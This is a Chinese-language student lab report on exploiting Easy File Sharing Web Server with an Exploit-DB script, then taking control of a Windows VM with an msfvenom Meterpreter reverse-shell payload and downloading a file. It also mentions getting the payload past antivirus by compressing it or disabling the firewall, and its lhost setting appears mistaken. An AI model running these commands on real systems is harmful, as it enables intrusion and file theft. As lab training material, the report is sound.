一、漏洞滲透測試
1、靶機安裝easy file sharing server(efssetup_2018.zip)
2、利用Nmap掃描發現靶機(Windows)運行了該服務。P99-100
3、利用該漏洞,使得靶機運行計算器。P116-119
具體實現過程:
- 使用namp掃描目標計算機:
查看目標計算機的相關信息
- 查找EasyFileSharing的有關漏洞:
- 查看腳本代碼:
截圖
- 執行該腳本:
使用命令:python /usr/share/exploitdb/exploits/windows/remote/39009.py 目標IP
- 執行結果:
Easy File Sharing Web Server服務崩潰,運行計算機
二、Metasploit應用
1、生成主控端、被控端。
2、獲得靶機(Windows)控制權。
3、下載靶機上任意一個文件。
P121-123;140-145
具體過程:
- 生成一個被控端
命令:msfvenom -p windows/meterpreter/reverse_tcp lhost=目標IP lport=5000 -f exe -o /root/payload.exe
生成的文件:
- 生成主控端后,在目標計算機運行被控端,獲得目標計算機的控制權,如圖所示:
- 對目標計算機的控制操作
查看目標計算機的文件信息,並下載文件hxy.txt文件
Ls //查看
Download 文件名 //下載文件
總結:經過對多台不同的虛擬機的測試嘗試,初步掌握了漏洞測試的基本操作,以及加深了對漏洞滲透測試的理解。遇到的問題:生成的被控端payload會被系統辨別為木馬,需要將被控端進行壓縮或者關閉防火牆,才能將被控端發送到靶機上。嘗試過在物理機上運行Easy File Sharing Web Server服務,然后在Kali上運行相應的py腳本,kali上顯示運行成功,但是計算機上沒有任何反應,猜想是防火牆阻止了該腳本的運行。